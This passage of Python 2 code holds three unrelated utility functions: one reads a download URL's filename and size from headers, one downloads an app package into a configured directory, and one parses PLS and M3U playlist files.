    url = re.search("(http://[^']*?m=dl[^']*)", response.get_data()).group()
    # Step 3: probe the URL to read filename/size from the headers.
    d = urllib.FancyURLopener().open(url)
    filename = d.headers['Content-Disposition'].split("filename=")[1]
    filesize = d.headers['Content-Length']
    d.close()
    logging.debug("TID=%s, URL=%s" % (tid, url))
    logging.debug("TID=%s, FILENAME=%s" % (tid, filename))
    logging.debug("TID=%s, FILESIZE=%s" % (tid, filesize))
    return (url, filename, filesize)
def download_latest_pkg(self):
    """Download the latest package for this app into the category's
    configured directory and return the local package path.

    The destination directory tree is created as needed; if the package
    file already exists it is not downloaded again.  Exits the process
    for an unknown category; logs and returns the (possibly incomplete)
    path on a short download.
    """
    # Map the category to its configured download root.
    if self.category == 'APP':
        path = config['app_path']
    elif self.category == 'TA':
        path = config['ta_path']
    elif self.category == 'SA':
        path = config['sa_path']
    else:
        print self.category + ' download path not found in config'
        exit()
    if not os.path.exists(path):
        os.makedirs(path)
    pkg_dir = os.path.join(path, self.name)
    if not os.path.exists(pkg_dir):
        os.makedirs(pkg_dir)
    pkg_path = os.path.join(pkg_dir, self.get_latest_pkg_name())
    if os.path.exists(pkg_path):
        # already downloaded
        pass
    else:
        try:
            fuo = urllib.FancyURLopener()
            stdout.write('waiting for downloading')
            stdout.flush()
            fuo.retrieve(self.get_latest_pkg_url(), pkg_path, _report_hook)
        except urllib.ContentTooShortError as err:
            # Download was truncated: report, log, and fall through so
            # the caller still gets the path.
            print 'failed to download the whole file. Please check your network connection or make sure there is enough disk space'
            logger.error('failed to download {url}. \n{err}'.format(
                url=self.get_latest_pkg_url(), err=str(err)))
    return pkg_path
def parsePLS(self, url):
    """Fetch a playlist URL and return a dict of {index: stream-url}.

    Dispatches on the URL's extension: '.pls' files are parsed with
    ConfigParser ([playlist] File1..FileN entries), '.m3u' files line
    by line keeping only http entries; any other URL is treated as a
    direct stream and returned as item 1.
    """
    tmp = url.split('.')
    last = len(tmp) - 1
    opener = urllib.FancyURLopener({})
    f = opener.open(url)
    i = 1
    items = {}
    if tmp[last].lower().rstrip() == 'pls':
        # PLS: standard INI-style playlist.
        config = ConfigParser.RawConfigParser()
        config.readfp(f)
        numberOfItems = int(config.get('playlist', 'NumberOfEntries'))
        while i <= numberOfItems:
            items[i] = config.get('playlist', 'File' + str(i))
            i += 1
    elif tmp[last].lower().rstrip() == 'm3u':
        # M3U: keep only lines that start with an http URL.
        while True:
            line = f.readline()
            lineSplit = line.split(':')
            if (lineSplit[0].lower().rstrip() == 'http'):
                # NOTE(review): this compares against a single space --
                # presumably meant to skip blank lines; confirm.
                if line != ' ':
                    items[i] = line.rstrip()
                    i += 1
            if line == '':
                # EOF
                break
    else:
        # Not a playlist: treat the URL itself as the only stream.
        items[1] = url.rstrip()
    f.close()
    return items